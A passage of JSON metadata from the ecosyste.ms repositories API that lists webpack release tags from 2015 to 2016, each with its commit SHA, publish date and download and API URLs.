job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11/manifests"},{"name":"v2.1.0-beta.10","sha":"2343af44bb4314bafc1ba29cd019bc4b28edbcbf","kind":"tag","published_at":"2016-06-05T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10/manifests"},{"name":"v2.1.0-beta.9","sha":"dc3bd055027d8d1ebbb0ebdd07fb73387a0ab6d1","kind":"tag","published_at":"2016-06-04T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9/manifests"},{"name":"v2.1.0-beta.8","sha":"abf0cefd592700a19856c3ef9b6d65f905ec73c1","kind":"tag","published_at":"2016-05-29T18:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8/manifests"},{"name":"v1.13.1","sha":"01ea02a95cf8c446fd1dc9e82fae0febe9332034","kind":"tag","published_at":"2016-05-20T06:48:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1/manifests"},{"name":"v2.1.0-beta.7","sha":"9162f9e6eea62137139f95b8aaedee335c870edd","kind":"tag","published_at":"2016-05-06T22:00:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7/manifests"},{"name":"v2.1.0-beta.6","sha":"ca8b693c2c17bd06778476381fae23b3b21c0475","kind":"tag","published_at":"2016-04-21T23:03:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6/manifests"},{"name":"v1.13.0","sha":"006d59500de0493c4096d5d4cecd64eb12db2b95","kind":"tag","published_at":"2016-04-15T13:18:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0/manifests"},{"name":"v1.12.15","sha":"ee1b8c43b474b22a20bfc25daf0ee153dfb2ef9f","kind":"tag","published_at":"2016-04-10T22:47:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15/manifests"},{"name":"v2.1.0-beta.5","sha":"54405b59b1dd9724e145d4d16726a926042d0e1d","kind":"tag","published_at":"2016-04-10T22:45:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5/manifests"},{"name":"v2.1.0-beta.4","sha":"c5cc1d25a2a4c0fabdec49a86b3bc62a5d637729","kind":"tag","published_at":"2016-02-24T22:58:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4/manifests"},{"name":"v2.1.0-beta.3","sha":"13f8b690f0eb9e6058c10631e01e54fb88cd7143","kind":"tag","published_at":"2016-02-22T22:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3/manifests"},{"name":"v1.12.14","sha":"3ed27836b488401a7e9be2de1491a868a8b6f123","kind":"tag","published_at":"2016-02-22T22:04:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14/manifests"},{"name":"v2.1.0-beta.2","sha":"69d0d2e4cfe9545d530c4e1bcb59ea01969a9908","kind":"tag","published_at":"2016-02-22T14:31:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2/manifests"},{"name":"v2.1.0-beta.1","sha":"fd1e68f5826743b72590e8a97bcfb3d7f78745dd","kind":"tag","published_at":"2016-02-22T12:29:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1/manifests"},{"name":"v2.1.0-beta.0","sha":"52822286a347bf525eeab7f035341fc25e857914","kind":"tag","published_at":"2016-02-22T08:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0/manifests"},{"name":"v1.12.13","sha":"668a5f0bc68cad70c5182ebcab8b3b1a340e038d","kind":"tag","published_at":"2016-02-04T14:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13/manifests"},{"name":"v2.0.7-beta","sha":"432bf35df499e09585c0efeedb3ddbed337d3ed9","kind":"tag","published_at":"2016-02-04T13:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.7-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.7-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.7-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta/manifests"},{"name":"v2.0.6-beta","sha":"71f0945a81e83cc87026d62424f504d00dc6aec3","kind":"tag","published_at":"2016-01-30T12:24:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.6-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.6-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.6-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta/manifests"},{"name":"v2.0.5-beta","sha":"ac45c3c1a4c9b51eceecba79c6ae1a60887368de","kind":"tag","published_at":"2016-01-26T17:20:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.5-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.5-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.5-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta/manifests"},{"name":"v1.12.12","sha":"c0420f1ca8e2a444a5b5192a58d88d8d7d710bb7","kind":"tag","published_at":"2016-01-23T12:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12/manifests"},{"name":"v2.0.4-beta","sha":"bba8afdeef79a7c6e1be6688107fdff3109463bc","kind":"tag","published_at":"2016-01-21T18:19:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.4-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.4-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.4-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta/manifests"},{"name":"v2.0.3-beta","sha":"b7754b645e50608165e0a28ca4735cd0efcfa0d9","kind":"tag","published_at":"2016-01-21T18:16:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.3-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.3-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.3-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta/manifests"},{"name":"v1.12.11","sha":"ab433884f140d694241c54e9c6f9de7f049aec6d","kind":"tag","published_at":"2016-01-11T18:14:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11/manifests"},{"name":"v1.12.10","sha":"66142f2f89868b8e380c4883513cb974680e20e2","kind":"tag","published_at":"2016-01-06T19:29:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10/manifests"},{"name":"v2.0.2-beta","sha":"0915889feb8558a07b053010e56748566e108285","kind":"tag","published_at":"2015-12-22T11:53:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.2-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.2-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.2-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta/manifests"},{"name":"v2.0.1-beta","sha":"11932d75a4c8034e5d8afb50985159d33fdb8ddc","kind":"tag","published_at":"2015-11-24T07:28:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.1-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.1-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.1-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta/manifests"},{"name":"v1.12.9","sha":"9766f2bde3c3f3e7b3b0e914c9cb81ea3a12e823","kind":"tag","published_at":"2015-11-24T07:09:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9/manifests"},{"name":"v1.12.8","sha":"b59528164913d1234e9dccc55bdfbba2e75767d2","kind":"tag","published_at":"2015-11-20T20:32:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8/manifests"},{"name":"v1.12.7","sha":"a6c4414a7f38d8098f128bc50e8c83ed4a9de607","kind":"tag","published_at":"2015-11-20T19:32:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7/manifests"},{"name":"v1.12.6","sha":"7c3e68e8df03cdcef7a6102f61ed4b8cc91cda78","kind":"tag","published_at":"2015-11-14T08:29:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6/manifests"},{"name":"v1.12.5","sha":"3266bbcd16f8a80c35fcd518bf2fb2fe8997692c","kind":"tag","published_at":"2015-11-13T21:25:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5/manifests"},{"name":"v1.12.4","sha":"530f669e13770ccf5082f29dbde1b114e6173a07","kind":"tag","published_at":"2015-11-10T20:29:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4/manifests"},{"name":"v1.12.3","sha":"f3d65ef1b5a6ebba85083536e3a705fe96d31220","kind":"tag","published_at":"2015-11-06T00:10:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3/manifests"},{"name":"v2.0.0-beta","sha":"b2ba75b4c4360b0f14cb23fdb66355457de6f810","kind":"commit","published_at":"2015-11-01T22:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.0-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta/manifests"},{"name":"v1.12.2","sha":"89fda6a575eb379d974a30a5229d74c77ba35cc5","kind":"tag","published_at":"2015-09-16T21:13:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"cfcac5e3b62a52012318204dc798d7394e9ac6a9","kind":"tag","published_at":"2015-09-03T12:26:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"f155f32271ff81fee546c86b5685803377cebc09","kind":"tag","published_at":"2015-08-25T08:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0/manifests"},{"name":"v1.11.0","sha":"5335781be8c06c2ff9443431a196f6a94ca80bb3","kind":"tag","published_at":"2015-08-06T11:30:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0/manifests"},{"name":"v1.10.5","sha":"c4d78f7ca6e4a20e5b68f2720970a08cadb013e4","kind":"tag","published_at":"2015-07-23T22:04:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5/manifests"},{"name":"v1.10.4","sha":"107aa63c452d46c0628c53b856bd95e7e3d1b4ed","kind":"tag","published_at":"2015-07-23T21:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4/manifests"},{"name":"v1.10.3","sha":"b99eb70ce63ad33e23e9eef5ee6b4511846acba2","kind":"tag","published_at":"2015-07-22T21:53:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"c2a8b8a843609cbeeeafe92f81894dbe306d38a0","kind":"tag","published_at":"2015-07-22T20:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"f711f66f4cec8c72ba6a831eba8e662149508951","kind":"tag","published_at":"2015-07-02T13:25:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"df4e2e4e3df27d682feb962b896595d7eab27c2a","kind":"tag","published_at":"2015-06-27T20:50:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0/manifests"},{"name":"v1.9.13","sha":"e925c52a0e9fa55b06ffcc3b575e7f1621714056","kind":"tag","published_at":"2015-06-27T09:38:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13/manifests"},{"name":"v1.9.12","sha":"ba03fda4b5d2a515ccd87d26f3edd0dd357c4fde","kind":"tag","published_at":"2015-06-24T21:24:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.g